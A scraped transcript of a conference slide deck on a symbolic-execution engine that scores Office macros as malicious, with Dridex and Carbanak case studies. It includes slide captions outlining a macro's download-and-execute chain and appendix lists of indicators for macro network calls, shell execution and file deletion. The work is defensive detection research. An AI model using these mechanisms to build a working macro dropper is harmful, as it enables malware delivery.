isolating the ghost in the machine: unveiling post exploitation threats · pdf fileisolating...
TRANSCRIPT
![Page 1: Isolating the Ghost in the Machine: Unveiling Post Exploitation Threats · PDF fileIsolating the Ghost in the Machine: Unveiling Post Exploitation Threats. HTA-R11. Senior Security](https://reader031.vdocuments.us/reader031/viewer/2022030501/5aad60567f8b9a693f8e4480/html5/thumbnails/1.jpg)
SESSION ID:SESSION ID:
#RSAC
Rotem Salinas
Isolating the Ghost in the Machine: Unveiling Post Exploitation Threats
HTA-R11
Senior Security ResearcherRSA [email protected]@rotemsalinas
Uri Fleyder-KotlerAdvanced Threats Research Lab ManagerRSA [email protected]@ufleyder
![Page 2: Isolating the Ghost in the Machine: Unveiling Post Exploitation Threats · PDF fileIsolating the Ghost in the Machine: Unveiling Post Exploitation Threats. HTA-R11. Senior Security](https://reader031.vdocuments.us/reader031/viewer/2022030501/5aad60567f8b9a693f8e4480/html5/thumbnails/2.jpg)
#RSAC
Houston We Have a Problem
2
Agentless/non malware attacks is a rapidly growing threat
Attackers are implementing stealthier methods to bypass defenses
![Page 3: Isolating the Ghost in the Machine: Unveiling Post Exploitation Threats · PDF fileIsolating the Ghost in the Machine: Unveiling Post Exploitation Threats. HTA-R11. Senior Security](https://reader031.vdocuments.us/reader031/viewer/2022030501/5aad60567f8b9a693f8e4480/html5/thumbnails/3.jpg)
#RSAC
Research Goals
3
GoalsFind a way to assess a script’s “maliciousness” automaticallyDo it without the potential harm of infectionMake it fast!
Narrow the problem spaceVBA PowershellNot focused on the code extraction
The same concepts can apply to similar problems
![Page 4: Isolating the Ghost in the Machine: Unveiling Post Exploitation Threats · PDF fileIsolating the Ghost in the Machine: Unveiling Post Exploitation Threats. HTA-R11. Senior Security](https://reader031.vdocuments.us/reader031/viewer/2022030501/5aad60567f8b9a693f8e4480/html5/thumbnails/4.jpg)
#RSAC
The “Imaginary Engine”
4
How can we develop such 1337 imaginary engine
Problem solving in 3 basic stepsAnalyzeBrainstormingImplementation
![Page 5: Isolating the Ghost in the Machine: Unveiling Post Exploitation Threats · PDF fileIsolating the Ghost in the Machine: Unveiling Post Exploitation Threats. HTA-R11. Senior Security](https://reader031.vdocuments.us/reader031/viewer/2022030501/5aad60567f8b9a693f8e4480/html5/thumbnails/5.jpg)
#RSAC
The First Step – Malware Analyst Standpoint
5
DetermineExecution
FlowDeobfuscate
Find Suspicious
Activity
Traditional Static Analysis Approach
![Page 6: Isolating the Ghost in the Machine: Unveiling Post Exploitation Threats · PDF fileIsolating the Ghost in the Machine: Unveiling Post Exploitation Threats. HTA-R11. Senior Security](https://reader031.vdocuments.us/reader031/viewer/2022030501/5aad60567f8b9a693f8e4480/html5/thumbnails/6.jpg)
#RSAC
Perception Test – What Attackers Do?
6
![Page 7: Isolating the Ghost in the Machine: Unveiling Post Exploitation Threats · PDF fileIsolating the Ghost in the Machine: Unveiling Post Exploitation Threats. HTA-R11. Senior Security](https://reader031.vdocuments.us/reader031/viewer/2022030501/5aad60567f8b9a693f8e4480/html5/thumbnails/7.jpg)
#RSAC
The First Step – Understanding The Attacker’s Mindset
7
![Page 8: Isolating the Ghost in the Machine: Unveiling Post Exploitation Threats · PDF fileIsolating the Ghost in the Machine: Unveiling Post Exploitation Threats. HTA-R11. Senior Security](https://reader031.vdocuments.us/reader031/viewer/2022030501/5aad60567f8b9a693f8e4480/html5/thumbnails/8.jpg)
#RSAC
The First Step – Understanding The Attacker’s Mindset
8
![Page 9: Isolating the Ghost in the Machine: Unveiling Post Exploitation Threats · PDF fileIsolating the Ghost in the Machine: Unveiling Post Exploitation Threats. HTA-R11. Senior Security](https://reader031.vdocuments.us/reader031/viewer/2022030501/5aad60567f8b9a693f8e4480/html5/thumbnails/9.jpg)
#RSAC
The First Step – The Attacker’s Main Objectives
9
Objectives Indicators
Code execution Prerequisite, Spawning New Processes/Threads
Persistency Disk operations, Registry operations
Stealth OS manipulation
Enumeration Registry operations, Enumeration
Command & Control / Data Exfiltration Network operations
Lateral Movement Network operations, Enumeration
![Page 10: Isolating the Ghost in the Machine: Unveiling Post Exploitation Threats · PDF fileIsolating the Ghost in the Machine: Unveiling Post Exploitation Threats. HTA-R11. Senior Security](https://reader031.vdocuments.us/reader031/viewer/2022030501/5aad60567f8b9a693f8e4480/html5/thumbnails/10.jpg)
#RSAC
Case Study – Dridex Campaign
10
Peaked during 2015-2016
Used Macro in Office Documents to deploy Dridex variants
Targeted many companies and financial entities around the world
Delivered in a large scale Spam/Spear-Phishing campaigns
![Page 11: Isolating the Ghost in the Machine: Unveiling Post Exploitation Threats · PDF fileIsolating the Ghost in the Machine: Unveiling Post Exploitation Threats. HTA-R11. Senior Security](https://reader031.vdocuments.us/reader031/viewer/2022030501/5aad60567f8b9a693f8e4480/html5/thumbnails/11.jpg)
#RSAC
Case Study – Dridex Campaign
11
![Page 12: Isolating the Ghost in the Machine: Unveiling Post Exploitation Threats · PDF fileIsolating the Ghost in the Machine: Unveiling Post Exploitation Threats. HTA-R11. Senior Security](https://reader031.vdocuments.us/reader031/viewer/2022030501/5aad60567f8b9a693f8e4480/html5/thumbnails/12.jpg)
#RSAC
Case Study 1 – Dridex Campaign
12
Entrypoint – This is where the code starts its execution
Non-Linear Code Execution - GoTo jumping to labels
![Page 13: Isolating the Ghost in the Machine: Unveiling Post Exploitation Threats · PDF fileIsolating the Ghost in the Machine: Unveiling Post Exploitation Threats. HTA-R11. Senior Security](https://reader031.vdocuments.us/reader031/viewer/2022030501/5aad60567f8b9a693f8e4480/html5/thumbnails/13.jpg)
#RSAC
Case Study 1 – Dridex Campaign
13
COM Object Creation
![Page 14: Isolating the Ghost in the Machine: Unveiling Post Exploitation Threats · PDF fileIsolating the Ghost in the Machine: Unveiling Post Exploitation Threats. HTA-R11. Senior Security](https://reader031.vdocuments.us/reader031/viewer/2022030501/5aad60567f8b9a693f8e4480/html5/thumbnails/14.jpg)
#RSAC
Case Study 1 – Dridex Campaign
14
URL De-Obfuscation + Http Request Creation
![Page 15: Isolating the Ghost in the Machine: Unveiling Post Exploitation Threats · PDF fileIsolating the Ghost in the Machine: Unveiling Post Exploitation Threats. HTA-R11. Senior Security](https://reader031.vdocuments.us/reader031/viewer/2022030501/5aad60567f8b9a693f8e4480/html5/thumbnails/15.jpg)
#RSAC
Case Study 1 – Dridex Campaign
15
Sending GET request
Initializing ADODB object to write file to disk
![Page 16: Isolating the Ghost in the Machine: Unveiling Post Exploitation Threats · PDF fileIsolating the Ghost in the Machine: Unveiling Post Exploitation Threats. HTA-R11. Senior Security](https://reader031.vdocuments.us/reader031/viewer/2022030501/5aad60567f8b9a693f8e4480/html5/thumbnails/16.jpg)
#RSAC
Case Study 1 – Dridex Campaign
16
Writing Response Body Data to disk
![Page 17: Isolating the Ghost in the Machine: Unveiling Post Exploitation Threats · PDF fileIsolating the Ghost in the Machine: Unveiling Post Exploitation Threats. HTA-R11. Senior Security](https://reader031.vdocuments.us/reader031/viewer/2022030501/5aad60567f8b9a693f8e4480/html5/thumbnails/17.jpg)
#RSAC
Case Study 1 – Dridex Campaign
17
Executing Downloaded File
![Page 18: Isolating the Ghost in the Machine: Unveiling Post Exploitation Threats · PDF fileIsolating the Ghost in the Machine: Unveiling Post Exploitation Threats. HTA-R11. Senior Security](https://reader031.vdocuments.us/reader031/viewer/2022030501/5aad60567f8b9a693f8e4480/html5/thumbnails/18.jpg)
#RSAC
Case Study – Anunak/Carbanak
18
Financial APT
Only 1 submission to VT
Attributed to Anunak Cybergang
Final payloadVBS/PowershellPE Executable
See Full Analysis in Appendix
![Page 19: Isolating the Ghost in the Machine: Unveiling Post Exploitation Threats · PDF fileIsolating the Ghost in the Machine: Unveiling Post Exploitation Threats. HTA-R11. Senior Security](https://reader031.vdocuments.us/reader031/viewer/2022030501/5aad60567f8b9a693f8e4480/html5/thumbnails/19.jpg)
#RSAC
The Second Step – Brainstorming
19
Common approaches pros and consHooking— Use available source code or patch existing dll/exe— Inserting code that would sink certain expressions— Remove potentially harmful code
Taint Analysis / Symbolic Execution— Implement an engine that would emulate the language interpreter— The engine should evaluate each line of code— Instead of invoking potentially harmful expressions it would sink them
![Page 20: Isolating the Ghost in the Machine: Unveiling Post Exploitation Threats · PDF fileIsolating the Ghost in the Machine: Unveiling Post Exploitation Threats. HTA-R11. Senior Security](https://reader031.vdocuments.us/reader031/viewer/2022030501/5aad60567f8b9a693f8e4480/html5/thumbnails/20.jpg)
#RSAC
We Have a Winner!
20
Symbolic ExecutionPros— Cannot harm the machine in any way (even if we missed
something)— We know exactly how it works. NO Reverse Engineering!— Not limited to specific platform/OS
Cons— Hard to Implement— Might lack some language functionality
![Page 21: Isolating the Ghost in the Machine: Unveiling Post Exploitation Threats · PDF fileIsolating the Ghost in the Machine: Unveiling Post Exploitation Threats. HTA-R11. Senior Security](https://reader031.vdocuments.us/reader031/viewer/2022030501/5aad60567f8b9a693f8e4480/html5/thumbnails/21.jpg)
#RSAC
Symbolic Execution: Double Sweep Method
21
First sweepGlobal context— Global variables— Code
Function declarationsExternal DLL declarations
![Page 22: Isolating the Ghost in the Machine: Unveiling Post Exploitation Threats · PDF fileIsolating the Ghost in the Machine: Unveiling Post Exploitation Threats. HTA-R11. Senior Security](https://reader031.vdocuments.us/reader031/viewer/2022030501/5aad60567f8b9a693f8e4480/html5/thumbnails/22.jpg)
#RSAC
Symbolic Execution: Double Sweep Method
22
Second sweepFunction code - starts with EntrypointFollows execution flowExecutes stubs instead of built-in language functionsEvaluates expressions— Math— String manipulation— Logical expressions (condition evaluation)
![Page 23: Isolating the Ghost in the Machine: Unveiling Post Exploitation Threats · PDF fileIsolating the Ghost in the Machine: Unveiling Post Exploitation Threats. HTA-R11. Senior Security](https://reader031.vdocuments.us/reader031/viewer/2022030501/5aad60567f8b9a693f8e4480/html5/thumbnails/23.jpg)
#RSAC
Implementation Details
23
PythonPyParsingDave Beazley’s (Python guru) PLY – Python Lex Yacc— Lex – lexical analysis/tokenizer— Yacc (Yet Another Compiler Compiler) – Syntax Analyzer
BNF – Backus Naur Form
Where to start RTFM
![Page 24: Isolating the Ghost in the Machine: Unveiling Post Exploitation Threats · PDF fileIsolating the Ghost in the Machine: Unveiling Post Exploitation Threats. HTA-R11. Senior Security](https://reader031.vdocuments.us/reader031/viewer/2022030501/5aad60567f8b9a693f8e4480/html5/thumbnails/24.jpg)
#RSAC
Lexical Analyzer (Tokenizer)
24
TokensLanguage keywordsImmediate values— Strings— Integer/numeric values— Floating point values— Arrays/compound data-types
Identifiers – variable names, function names, object namesOperators – math, bitwise, logical, string manipulation
* Diagram courtesy of David Beazley
![Page 25: Isolating the Ghost in the Machine: Unveiling Post Exploitation Threats · PDF fileIsolating the Ghost in the Machine: Unveiling Post Exploitation Threats. HTA-R11. Senior Security](https://reader031.vdocuments.us/reader031/viewer/2022030501/5aad60567f8b9a693f8e4480/html5/thumbnails/25.jpg)
#RSAC
Syntax Analyzer (Parser)
25
Parses a language syntax according to the tokenized output from the lexer
The language syntax/grammar is defined by multiple functions
Each function represents a BNF expression and will pass the parsed/extracted values to the next function inline according to the BNF statement
* Diagram courtesy of David Beazley
![Page 26: Isolating the Ghost in the Machine: Unveiling Post Exploitation Threats · PDF fileIsolating the Ghost in the Machine: Unveiling Post Exploitation Threats. HTA-R11. Senior Security](https://reader031.vdocuments.us/reader031/viewer/2022030501/5aad60567f8b9a693f8e4480/html5/thumbnails/26.jpg)
#RSAC
PLY Lex Example
26
* Diagram courtesy of David Beazley
![Page 27: Isolating the Ghost in the Machine: Unveiling Post Exploitation Threats · PDF fileIsolating the Ghost in the Machine: Unveiling Post Exploitation Threats. HTA-R11. Senior Security](https://reader031.vdocuments.us/reader031/viewer/2022030501/5aad60567f8b9a693f8e4480/html5/thumbnails/27.jpg)
#RSAC
PLY Lex Example
27
* Diagram courtesy of David Beazley
![Page 28: Isolating the Ghost in the Machine: Unveiling Post Exploitation Threats · PDF fileIsolating the Ghost in the Machine: Unveiling Post Exploitation Threats. HTA-R11. Senior Security](https://reader031.vdocuments.us/reader031/viewer/2022030501/5aad60567f8b9a693f8e4480/html5/thumbnails/28.jpg)
#RSAC
PLY Lex Example
28
* Diagram courtesy of David Beazley
![Page 29: Isolating the Ghost in the Machine: Unveiling Post Exploitation Threats · PDF fileIsolating the Ghost in the Machine: Unveiling Post Exploitation Threats. HTA-R11. Senior Security](https://reader031.vdocuments.us/reader031/viewer/2022030501/5aad60567f8b9a693f8e4480/html5/thumbnails/29.jpg)
#RSAC
PLY Lex Example
29
* Diagram courtesy of David Beazley
![Page 30: Isolating the Ghost in the Machine: Unveiling Post Exploitation Threats · PDF fileIsolating the Ghost in the Machine: Unveiling Post Exploitation Threats. HTA-R11. Senior Security](https://reader031.vdocuments.us/reader031/viewer/2022030501/5aad60567f8b9a693f8e4480/html5/thumbnails/30.jpg)
#RSAC
PLY Lex Example
30
* Diagram courtesy of David Beazley
![Page 31: Isolating the Ghost in the Machine: Unveiling Post Exploitation Threats · PDF fileIsolating the Ghost in the Machine: Unveiling Post Exploitation Threats. HTA-R11. Senior Security](https://reader031.vdocuments.us/reader031/viewer/2022030501/5aad60567f8b9a693f8e4480/html5/thumbnails/31.jpg)
#RSAC
PLY Lex Example
31
* Diagram courtesy of David Beazley
![Page 32: Isolating the Ghost in the Machine: Unveiling Post Exploitation Threats · PDF fileIsolating the Ghost in the Machine: Unveiling Post Exploitation Threats. HTA-R11. Senior Security](https://reader031.vdocuments.us/reader031/viewer/2022030501/5aad60567f8b9a693f8e4480/html5/thumbnails/32.jpg)
#RSAC
PLY Lex Example
32
* Diagram courtesy of David Beazley
![Page 33: Isolating the Ghost in the Machine: Unveiling Post Exploitation Threats · PDF fileIsolating the Ghost in the Machine: Unveiling Post Exploitation Threats. HTA-R11. Senior Security](https://reader031.vdocuments.us/reader031/viewer/2022030501/5aad60567f8b9a693f8e4480/html5/thumbnails/33.jpg)
#RSAC
PLY Lex Example
33
* Diagram courtesy of David Beazley
![Page 34: Isolating the Ghost in the Machine: Unveiling Post Exploitation Threats · PDF fileIsolating the Ghost in the Machine: Unveiling Post Exploitation Threats. HTA-R11. Senior Security](https://reader031.vdocuments.us/reader031/viewer/2022030501/5aad60567f8b9a693f8e4480/html5/thumbnails/34.jpg)
#RSAC
Tokenizer Demo
34
![Page 35: Isolating the Ghost in the Machine: Unveiling Post Exploitation Threats · PDF fileIsolating the Ghost in the Machine: Unveiling Post Exploitation Threats. HTA-R11. Senior Security](https://reader031.vdocuments.us/reader031/viewer/2022030501/5aad60567f8b9a693f8e4480/html5/thumbnails/35.jpg)
#RSAC
PLY Yacc Example
35
* Diagram courtesy of David Beazley
![Page 36: Isolating the Ghost in the Machine: Unveiling Post Exploitation Threats · PDF fileIsolating the Ghost in the Machine: Unveiling Post Exploitation Threats. HTA-R11. Senior Security](https://reader031.vdocuments.us/reader031/viewer/2022030501/5aad60567f8b9a693f8e4480/html5/thumbnails/36.jpg)
#RSAC
PLY Yacc Example
36
* Diagram courtesy of David Beazley
![Page 37: Isolating the Ghost in the Machine: Unveiling Post Exploitation Threats · PDF fileIsolating the Ghost in the Machine: Unveiling Post Exploitation Threats. HTA-R11. Senior Security](https://reader031.vdocuments.us/reader031/viewer/2022030501/5aad60567f8b9a693f8e4480/html5/thumbnails/37.jpg)
#RSAC
PLY Yacc Example
37
* Diagram courtesy of David Beazley
![Page 38: Isolating the Ghost in the Machine: Unveiling Post Exploitation Threats · PDF fileIsolating the Ghost in the Machine: Unveiling Post Exploitation Threats. HTA-R11. Senior Security](https://reader031.vdocuments.us/reader031/viewer/2022030501/5aad60567f8b9a693f8e4480/html5/thumbnails/38.jpg)
#RSAC
PLY Yacc Example
38
* Diagram courtesy of David Beazley
![Page 39: Isolating the Ghost in the Machine: Unveiling Post Exploitation Threats · PDF fileIsolating the Ghost in the Machine: Unveiling Post Exploitation Threats. HTA-R11. Senior Security](https://reader031.vdocuments.us/reader031/viewer/2022030501/5aad60567f8b9a693f8e4480/html5/thumbnails/39.jpg)
#RSAC
PLY Yacc Example
39
* Diagram courtesy of David Beazley
![Page 40: Isolating the Ghost in the Machine: Unveiling Post Exploitation Threats · PDF fileIsolating the Ghost in the Machine: Unveiling Post Exploitation Threats. HTA-R11. Senior Security](https://reader031.vdocuments.us/reader031/viewer/2022030501/5aad60567f8b9a693f8e4480/html5/thumbnails/40.jpg)
#RSAC
Engine Design Overview
40
Scoring
Blacklist (score++)
Whitelist (score--)
A higher score -> more malicious
If score >= threshold Then isMalicious = True;
![Page 41: Isolating the Ghost in the Machine: Unveiling Post Exploitation Threats · PDF fileIsolating the Ghost in the Machine: Unveiling Post Exploitation Threats. HTA-R11. Senior Security](https://reader031.vdocuments.us/reader031/viewer/2022030501/5aad60567f8b9a693f8e4480/html5/thumbnails/41.jpg)
#RSAC
Obfuscation As Heuristics
41
Obfuscation can be a strong indicator for malicious behavior
ExamplesObject returned from function call
Object created from function call return value string
![Page 42: Isolating the Ghost in the Machine: Unveiling Post Exploitation Threats · PDF fileIsolating the Ghost in the Machine: Unveiling Post Exploitation Threats. HTA-R11. Senior Security](https://reader031.vdocuments.us/reader031/viewer/2022030501/5aad60567f8b9a693f8e4480/html5/thumbnails/42.jpg)
#RSAC
Obfuscation As Heuristics – More Examples
42
More ExamplesSelf modifying code (during runtime)
Data read from controls embedded in the document is considered suspicious
![Page 43: Isolating the Ghost in the Machine: Unveiling Post Exploitation Threats · PDF fileIsolating the Ghost in the Machine: Unveiling Post Exploitation Threats. HTA-R11. Senior Security](https://reader031.vdocuments.us/reader031/viewer/2022030501/5aad60567f8b9a693f8e4480/html5/thumbnails/43.jpg)
#RSAC
Demo The Engine
43
![Page 44: Isolating the Ghost in the Machine: Unveiling Post Exploitation Threats · PDF fileIsolating the Ghost in the Machine: Unveiling Post Exploitation Threats. HTA-R11. Senior Security](https://reader031.vdocuments.us/reader031/viewer/2022030501/5aad60567f8b9a693f8e4480/html5/thumbnails/44.jpg)
#RSAC
The Age Old Question of FP vs. FN
44
False positives
False negatives
Decide what works best for you!
![Page 45: Isolating the Ghost in the Machine: Unveiling Post Exploitation Threats · PDF fileIsolating the Ghost in the Machine: Unveiling Post Exploitation Threats. HTA-R11. Senior Security](https://reader031.vdocuments.us/reader031/viewer/2022030501/5aad60567f8b9a693f8e4480/html5/thumbnails/45.jpg)
#RSAC
Lessons Learned
45
ChallengesCondition evaluationRecursion limit
LessonsWhen in doubt bruteforce!Use the language specification guide as a guideline rather than implementingevery language feature that exists
![Page 46: Isolating the Ghost in the Machine: Unveiling Post Exploitation Threats · PDF fileIsolating the Ghost in the Machine: Unveiling Post Exploitation Threats. HTA-R11. Senior Security](https://reader031.vdocuments.us/reader031/viewer/2022030501/5aad60567f8b9a693f8e4480/html5/thumbnails/46.jpg)
#RSAC
Apply
46
DIY 1: Develop It Yourself
DIY 2: Deploy In Your OrganizationNetworkEndpoint
Use for your investigations
![Page 47: Isolating the Ghost in the Machine: Unveiling Post Exploitation Threats · PDF fileIsolating the Ghost in the Machine: Unveiling Post Exploitation Threats. HTA-R11. Senior Security](https://reader031.vdocuments.us/reader031/viewer/2022030501/5aad60567f8b9a693f8e4480/html5/thumbnails/47.jpg)
#RSAC
Q&ARotem Salinas Uri Fleyder-Kotler
@ufleyder
@rotemsalinas
![Page 48: Isolating the Ghost in the Machine: Unveiling Post Exploitation Threats · PDF fileIsolating the Ghost in the Machine: Unveiling Post Exploitation Threats. HTA-R11. Senior Security](https://reader031.vdocuments.us/reader031/viewer/2022030501/5aad60567f8b9a693f8e4480/html5/thumbnails/48.jpg)
#RSAC
VBA Indicators of Suspicious Activity
48
File System OperationsCOM Objects: Scripting.FileSystemObject, ADODB.StreamCmd – output redirect/copy/del/moveOpen builtin functionImporting External DLLs - URLMON
Network OperationsCOM Objects: Microsoft.XMLHTTP, WinHttp.WinHttpRequest
OS ManipulationImporting External DLLs – KERNEL32WMI Objects
RegistryImporting External DLLs – ADVAPI32
![Page 49: Isolating the Ghost in the Machine: Unveiling Post Exploitation Threats · PDF fileIsolating the Ghost in the Machine: Unveiling Post Exploitation Threats. HTA-R11. Senior Security](https://reader031.vdocuments.us/reader031/viewer/2022030501/5aad60567f8b9a693f8e4480/html5/thumbnails/49.jpg)
#RSAC
VBA Indicators of Suspicious Activity
49
EnumerationWMI ObjectsCmd – net share/net use/ipconfig/environment variables
Obfuscation
Self Modifying CodeEvalCodeModule
Obfuscation Beyond Reasonable Doubt
![Page 50: Isolating the Ghost in the Machine: Unveiling Post Exploitation Threats · PDF fileIsolating the Ghost in the Machine: Unveiling Post Exploitation Threats. HTA-R11. Senior Security](https://reader031.vdocuments.us/reader031/viewer/2022030501/5aad60567f8b9a693f8e4480/html5/thumbnails/50.jpg)
#RSAC
VBA Indicators of Suspicious Activity
50
COM Object Creation
WMI Objects Creation
Self Modifying CodeEvalCodeModule
Built-In Functions
Importing External DLL
Obfuscation Beyond Reasonable Doubt
![Page 51: Isolating the Ghost in the Machine: Unveiling Post Exploitation Threats · PDF fileIsolating the Ghost in the Machine: Unveiling Post Exploitation Threats. HTA-R11. Senior Security](https://reader031.vdocuments.us/reader031/viewer/2022030501/5aad60567f8b9a693f8e4480/html5/thumbnails/51.jpg)
#RSAC
VBA – COM Object Creation – Network Activity
51
Rule of thumb - If your Office Documents are communicating you are in serious troubleNetwork Activity - COM Objects
Microsoft.XMLHTTPMSXML2.SERVERXMLHTTP.6.0MSXML2.SERVERXMLHTTPMSXML2.XMLHTTPWinHttp.WinHttpRequest.5.1WinHttp.WinHttpRequestInternetExplorer.Application
![Page 52: Isolating the Ghost in the Machine: Unveiling Post Exploitation Threats · PDF fileIsolating the Ghost in the Machine: Unveiling Post Exploitation Threats. HTA-R11. Senior Security](https://reader031.vdocuments.us/reader031/viewer/2022030501/5aad60567f8b9a693f8e4480/html5/thumbnails/52.jpg)
#RSAC
VBA – COM Object Creation – Network Activity
52
Microsoft.XMLHTTP
WinHttp.WinHttpRequest.5.1
![Page 53: Isolating the Ghost in the Machine: Unveiling Post Exploitation Threats · PDF fileIsolating the Ghost in the Machine: Unveiling Post Exploitation Threats. HTA-R11. Senior Security](https://reader031.vdocuments.us/reader031/viewer/2022030501/5aad60567f8b9a693f8e4480/html5/thumbnails/53.jpg)
#RSAC
VBA – COM Object Creation – File System Activity
53
Scripting.FileSystemObject
ADODB.Stream
![Page 54: Isolating the Ghost in the Machine: Unveiling Post Exploitation Threats · PDF fileIsolating the Ghost in the Machine: Unveiling Post Exploitation Threats. HTA-R11. Senior Security](https://reader031.vdocuments.us/reader031/viewer/2022030501/5aad60567f8b9a693f8e4480/html5/thumbnails/54.jpg)
#RSAC
VBA – COM Object Creation – Command Execution
54
WScript.Shell
Shell.Application
![Page 55: Isolating the Ghost in the Machine: Unveiling Post Exploitation Threats · PDF fileIsolating the Ghost in the Machine: Unveiling Post Exploitation Threats. HTA-R11. Senior Security](https://reader031.vdocuments.us/reader031/viewer/2022030501/5aad60567f8b9a693f8e4480/html5/thumbnails/55.jpg)
#RSAC
VBA – COM Object Creation – Obfuscation
55
XStandard.Base64
MSXML2.DOMDocument.3.0
MSXML2.DOMDocument
![Page 56: Isolating the Ghost in the Machine: Unveiling Post Exploitation Threats · PDF fileIsolating the Ghost in the Machine: Unveiling Post Exploitation Threats. HTA-R11. Senior Security](https://reader031.vdocuments.us/reader031/viewer/2022030501/5aad60567f8b9a693f8e4480/html5/thumbnails/56.jpg)
#RSAC
VBA – Built-In Functions
56
CreateObject – Create COM object by String Object NameGetObject – Create WMI/COM objectEval – Covered In Self-ModifyingExecuteGlobal – VBS specificCallByName – Calls a Function/Method by string nameShell – Executes a CommandEnviron – Evaluates Environment VariablesKill – Deletes a FileApplication.Run – Calls a Function by String Name
![Page 57: Isolating the Ghost in the Machine: Unveiling Post Exploitation Threats · PDF fileIsolating the Ghost in the Machine: Unveiling Post Exploitation Threats. HTA-R11. Senior Security](https://reader031.vdocuments.us/reader031/viewer/2022030501/5aad60567f8b9a693f8e4480/html5/thumbnails/57.jpg)
#RSAC
VBA – WMI Object Creation
57
winmgmts:impersonationLevel=impersonate}!\.\root\cimv2
Examples.
.
![Page 58: Isolating the Ghost in the Machine: Unveiling Post Exploitation Threats · PDF fileIsolating the Ghost in the Machine: Unveiling Post Exploitation Threats. HTA-R11. Senior Security](https://reader031.vdocuments.us/reader031/viewer/2022030501/5aad60567f8b9a693f8e4480/html5/thumbnails/58.jpg)
#RSAC
VBA – Self-Modifying Code – Code Module
58
CodeModule – Allows modifications of the VBA code
![Page 59: Isolating the Ghost in the Machine: Unveiling Post Exploitation Threats · PDF fileIsolating the Ghost in the Machine: Unveiling Post Exploitation Threats. HTA-R11. Senior Security](https://reader031.vdocuments.us/reader031/viewer/2022030501/5aad60567f8b9a693f8e4480/html5/thumbnails/59.jpg)
#RSAC
VBA – Self-Modifying Code – Eval
59
Eval - Evaluates an expression and executes it code
ExecuteGlobal
![Page 60: Isolating the Ghost in the Machine: Unveiling Post Exploitation Threats · PDF fileIsolating the Ghost in the Machine: Unveiling Post Exploitation Threats. HTA-R11. Senior Security](https://reader031.vdocuments.us/reader031/viewer/2022030501/5aad60567f8b9a693f8e4480/html5/thumbnails/60.jpg)
#RSAC
VBA – Open Built-In Function
60
Write to File with Open Built-In Function
![Page 61: Isolating the Ghost in the Machine: Unveiling Post Exploitation Threats · PDF fileIsolating the Ghost in the Machine: Unveiling Post Exploitation Threats. HTA-R11. Senior Security](https://reader031.vdocuments.us/reader031/viewer/2022030501/5aad60567f8b9a693f8e4480/html5/thumbnails/61.jpg)
#RSAC
VBA – Importing External DLL
61
Win32 API
Examples.
.
![Page 62: Isolating the Ghost in the Machine: Unveiling Post Exploitation Threats · PDF fileIsolating the Ghost in the Machine: Unveiling Post Exploitation Threats. HTA-R11. Senior Security](https://reader031.vdocuments.us/reader031/viewer/2022030501/5aad60567f8b9a693f8e4480/html5/thumbnails/62.jpg)
#RSAC
Appendix – Case Study 1 A - Dridex
62
Entrypoint – This is where the code starts its execution
Non-Linear Code Execution - GoTo jumping to labels
![Page 63: Isolating the Ghost in the Machine: Unveiling Post Exploitation Threats · PDF fileIsolating the Ghost in the Machine: Unveiling Post Exploitation Threats. HTA-R11. Senior Security](https://reader031.vdocuments.us/reader031/viewer/2022030501/5aad60567f8b9a693f8e4480/html5/thumbnails/63.jpg)
#RSAC
Appendix – Case Study 1 A - Dridex
63
COM Object Creation
![Page 64: Isolating the Ghost in the Machine: Unveiling Post Exploitation Threats · PDF fileIsolating the Ghost in the Machine: Unveiling Post Exploitation Threats. HTA-R11. Senior Security](https://reader031.vdocuments.us/reader031/viewer/2022030501/5aad60567f8b9a693f8e4480/html5/thumbnails/64.jpg)
#RSAC
Appendix – Case Study 1 A - Dridex
64
URL De-Obfuscation + Http Request Creation
![Page 65: Isolating the Ghost in the Machine: Unveiling Post Exploitation Threats · PDF fileIsolating the Ghost in the Machine: Unveiling Post Exploitation Threats. HTA-R11. Senior Security](https://reader031.vdocuments.us/reader031/viewer/2022030501/5aad60567f8b9a693f8e4480/html5/thumbnails/65.jpg)
#RSAC
Appendix – Case Study 1 A - Dridex
65
Sending GET request
Initializing ADODB object to write file to disk
![Page 66: Isolating the Ghost in the Machine: Unveiling Post Exploitation Threats · PDF fileIsolating the Ghost in the Machine: Unveiling Post Exploitation Threats. HTA-R11. Senior Security](https://reader031.vdocuments.us/reader031/viewer/2022030501/5aad60567f8b9a693f8e4480/html5/thumbnails/66.jpg)
#RSAC
Appendix – Case Study 1 A - Dridex
66
Writing Response Body Data to disk
![Page 67: Isolating the Ghost in the Machine: Unveiling Post Exploitation Threats · PDF fileIsolating the Ghost in the Machine: Unveiling Post Exploitation Threats. HTA-R11. Senior Security](https://reader031.vdocuments.us/reader031/viewer/2022030501/5aad60567f8b9a693f8e4480/html5/thumbnails/67.jpg)
#RSAC
Appendix – Case Study 1 A - Dridex
67
Executing Downloaded File
![Page 68: Isolating the Ghost in the Machine: Unveiling Post Exploitation Threats · PDF fileIsolating the Ghost in the Machine: Unveiling Post Exploitation Threats. HTA-R11. Senior Security](https://reader031.vdocuments.us/reader031/viewer/2022030501/5aad60567f8b9a693f8e4480/html5/thumbnails/68.jpg)
#RSAC
Appendix – Case Study 1 B - Dridex
68
Defining Globals
Entrypoint
![Page 69: Isolating the Ghost in the Machine: Unveiling Post Exploitation Threats · PDF fileIsolating the Ghost in the Machine: Unveiling Post Exploitation Threats. HTA-R11. Senior Security](https://reader031.vdocuments.us/reader031/viewer/2022030501/5aad60567f8b9a693f8e4480/html5/thumbnails/69.jpg)
#RSAC
Appendix – Case Study 1 B - Dridex
69
Create obfuscated COM object
![Page 70: Isolating the Ghost in the Machine: Unveiling Post Exploitation Threats · PDF fileIsolating the Ghost in the Machine: Unveiling Post Exploitation Threats. HTA-R11. Senior Security](https://reader031.vdocuments.us/reader031/viewer/2022030501/5aad60567f8b9a693f8e4480/html5/thumbnails/70.jpg)
#RSAC
Appendix – Case Study 1 B - Dridex
70
Create more obfuscated COM objects
![Page 71: Isolating the Ghost in the Machine: Unveiling Post Exploitation Threats · PDF fileIsolating the Ghost in the Machine: Unveiling Post Exploitation Threats. HTA-R11. Senior Security](https://reader031.vdocuments.us/reader031/viewer/2022030501/5aad60567f8b9a693f8e4480/html5/thumbnails/71.jpg)
#RSAC
Appendix – Case Study 1 B - Dridex
71
Deobfuscate URL and create GET request
![Page 72: Isolating the Ghost in the Machine: Unveiling Post Exploitation Threats · PDF fileIsolating the Ghost in the Machine: Unveiling Post Exploitation Threats. HTA-R11. Senior Security](https://reader031.vdocuments.us/reader031/viewer/2022030501/5aad60567f8b9a693f8e4480/html5/thumbnails/72.jpg)
#RSAC
Appendix – Case Study 1 B - Dridex
72
